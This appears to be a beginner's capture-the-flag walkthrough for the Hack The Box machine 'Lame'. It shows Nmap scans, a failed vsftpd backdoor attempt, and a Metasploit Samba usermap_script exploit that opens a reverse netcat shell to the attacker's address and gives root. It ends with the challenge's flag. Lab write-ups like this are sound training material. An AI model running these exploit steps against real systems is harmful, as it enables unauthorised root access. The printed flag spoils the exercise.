Lame is one of the easiest machines to pwn on Hack The Box, making it perfect for beginners. Let's jump in!
This writeup assumes that you have:
- Connected to the Hack The Box VPN or Pwnbox
- Spawned the machine "Lame", and have been provided with the target IP address
This writeup is from the series of walkthroughs meant for the following purposes:
- For others to read and learn from
- To help reinforce my own learning
- To help facilitate Hack The Box Meetups in Calgary CA
ping
Begin by testing your ability to communicate with the target using the ping command. The target IP address here is 10.10.10.3, but there may be a different IP address provided for you.
If you don't see that any of the packets have been received, check your Hack The Box VPN connection.
If you see that most or all packets are received, it's time to start exploring the target machine.
ping 10.10.10.3PING 10.10.10.3 (10.10.10.3) 56(84) bytes of data.
64 bytes from 10.10.10.3: icmp_seq=1 ttl=63 time=64.0 ms
64 bytes from 10.10.10.3: icmp_seq=2 ttl=63 time=64.8 ms
64 bytes from 10.10.10.3: icmp_seq=3 ttl=63 time=73.7 ms
64 bytes from 10.10.10.3: icmp_seq=4 ttl=63 time=63.5 ms
--- 10.10.10.3 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 63.462/66.493/73.748/4.214 ms
Enumeration
Begin the enumeration by scanning the target machine using Nmap. Use the -sV flag to enable service version detection.
Nmap has told us that the host is down, but may be blocking our ping probes, and recommends trying the -Pn flag.
nmap -sV 10.10.10.3nmap 10.10.10.3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-06 21:13 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.40 seconds
Disable host discovery
Try Nmap again using the -Pn flag.
We can see now that the host is available with the following open ports:
- 21: FTP
- 22: SSH
- 139: netbios-ssn
- 445: microsoft-ds
nmap -sV -Pn 10.10.10.3Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-06 21:21 EDT
Nmap scan report for 10.10.10.3
Host is up (0.086s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds
Enable default Nmap Scripting Engine (NSE) scripts
This is all good information for us, but we could use more information about the services available on this box. Use Nmap again but this time include the -sC flag.
nmap -sV -sC -Pn 10.10.10.3Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-11 22:38 EDT
Nmap scan report for 10.10.10.3
Host is up (0.084s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.16.2
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-10-11T22:40:56-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h01m34s, deviation: 2h49m45s, median: 1m31s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.46 seconds
Metasploit console
Including the -sC flag has provided us with much more information, including the FTP service version vsftpd 2.3.4, which is known to be a vulnerable version of FTP. Let's start Metasploit using the msfconsole command.
msfconsole =[ metasploit v6.4.9-dev ]
+ -- --=[ 2420 exploits - 1248 auxiliary - 423 post ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
Search known vulnerabilities
To begin using the Metasploit framework, use the search command to find known vulnerabilities for a particular service and version. Make sure to include the name of the service and version, in this case vsftpd 2.3.4.
This Metasploit console search returns a Backdoor Command Execution exploit named vsftpd_234_backdoor.
msf6 > search vsftpd 2.3.4Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 >
Select module by index
To begin using a Module found using search, type the use command followed by either the index number or the name of the module
You should now see the Metasploit console prompt includes exploit(unix/ftp/vsftpd_234_backdoor), meaning that the Module is loaded and that we can begin to use it.
msf6 > use 0[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
Show options
Continue using the Metasploit console using the show options command, which allows us to configure settings for a Module before we use it against a target. For example, we will need to define the IP address of the target we are attaching using the RHOSTS configuration option.
msf6 > show optionsModule options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
Set RHOSTS
We need to tell the Metasploit console which IP addresses we want to target using this Module. The RHOSTS configuration option accepts either a single IP address, or a list of IP addresses we can set as targets.
set rhosts 10.10.10.3rhosts => 10.10.10.3
Check RHOSTS is set
Check that RHOSTS has been set by running the show options command again. This time you should see the target IP address configured for the RHOSTS option.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show optionsModule options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.3 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
Run exploit
It's time to attempt exploiting the target machine using the loaded Module. Use the exploit command within the Metasploit console to launch the vsftpd_234_backdoor attack!
Unfortunately, you will learn that this exploit does not work on this machine. You will see in the last line of output that the exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
Exit Metasploit console
Our attempt to exploit the target machine using the Module found in the Metasploit console has failed. We will need to gather more information about the target machine.
Return to the default Linux command-line interface using the exit command. This will close our session within the Metasploit console.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exitNo output. You will be returned back to the default Linux command line.
Enumeration #2
Use the same Nmap command as before including the -sV, -sC, and -Pn flags. By reading the output, you can see there are other potential services we can exploit which may allow access into the target machine.
nmap -sV -sC -Pn 10.10.10.3Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-11 23:25 EDT
Nmap scan report for 10.10.10.3
Host is up (0.078s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.16.2
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-10-11T23:27:03-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h01m35s, deviation: 2h49m45s, median: 1m32s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.98 seconds
Metasploit console #2
Return back to the Metasploit console using the msfconsole command to search for more exploit modules. After running this command you will once again see the default Linux command-line interface replaced by the Metasploit framework command-line interface.
msfconsole=[ metasploit v6.4.9-dev ]
+ -- --=[ 2420 exploits - 1248 auxiliary - 423 post ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
Search Samba
Use the Metasploit search command again to find exploit Modules available for samba version 3.0.20.
You will see that Metasploit returns a module named usermap_script. Let's attempt to use this module on the target machine to gain access.
msf6 > search samba 3.0.20Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Select module #2
Once again we can select the module we want to use by executing the use command. Remember to also specify the name or index number of the module, which in this case is 0.
msf6 > use 0>msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
Show options #2
Once again, check what options are available for configuration in this module by executing the show options command.
Remember that show options describes what options are required for this module. In our case we will need to configure the RHOSTS and LHOST module options.
msf6 exploit(multi/samba/usermap_script) > show optionsModule options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Set RHOSTS #2
Once again we set the RHOST module option using set rhosts.
Although we could specify multiple targets, we only specify the single IP address here, which is the IP address of the machine spawned by Hack The Box.
You will then see the RHOSTS set within the output provided by Metasploit console.
msf6 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3rhosts => 10.10.10.3
Check RHOSTS is set #2
If you want to be sure that RHOSTS is properly configured, execute the show options to output the updated configuration.
msf6 exploit(multi/samba/usermap_script) > show optionsModule options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.3 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Get local IP address
In order to establish a shell connection between our machine, and the target machine, we need to provide Metasploit console with not only the target machine IP address but also the IP address of our own machine within the Virtual Private Network (VPN).
There are two different ways we can fetch this IP address to provide the Metaploit console:
- Use the ip a and using the IP address provided under tun0. Ensure to use only the first four numbers without the slash and last number behind the slash.
- Your IP address within the VPN can be found using the Hack The Box web interface.
msf6 exploit(multi/samba/usermap_script) > ip a[*] exec: ip a
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:d2:26:79 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
valid_lft 78354sec preferred_lft 78354sec
inet6 fe80::9e44:e714:455e:6578/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: tun0: mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.10.16.2/23 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:4::1000/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::eb30:57df:47f6:f930/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
Set LHOST
Use the set lhost command to set the LHOST for this Metasploit module. Make sure to provide the IP address captured within the last step.
msf6 exploit(multi/samba/usermap_script) > set lhost 10.10.16.2lhost => 10.10.16.2
Run exploit #2
It's time to launch the attack against our target. Once again, use the exploit command to use this Metasploit module.
We can see within the output that the module was able to start a reverse TCP handler from our machine, and a command shell session has been opened.
msf6 exploit(multi/samba/usermap_script) > exploit[*] Started reverse TCP handler on 10.10.16.2:4444
[*] Command shell session 1 opened (10.10.16.2:4444 -> 10.10.10.3:44118) at 2024-10-12 13:28:13 -0400
"I'm in"
We have established a command shell session on the target machine. Check which user we are logged in as using the whoami command. To our pleasant surprise, the output confirms that we have access as the root user, allowing us to do anything on this machine.
Go ahead and say it...
whoamiroot
Search for root.txt #1
It's time to search for root.txt. Begin exploring the target machine by using the ls command, which lists the directories and files within current working directory.
See the root directory? That looks promising.
lsbin
boot
cdrom
dev
etc
home
initrd
initrd.img
initrd.img.old
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
Search for root.txt #2
Traverse to the root directory by using the cd command. This will change the corrent working directory to the root directory.
Once again, list the contents of the current working directory using the ls command.
We have found root.txt!
cd root
lsDesktop
reset_logs.sh
root.txt
vnc.log
Print root.txt to output
We're almost complete. Print the contents of root.txt to the command-line output using the cat command.
Copy the text from the output and submit the flag through Hack The Box.
cat root.txt6d9cf83846252d1b3ec362e1a347e9a6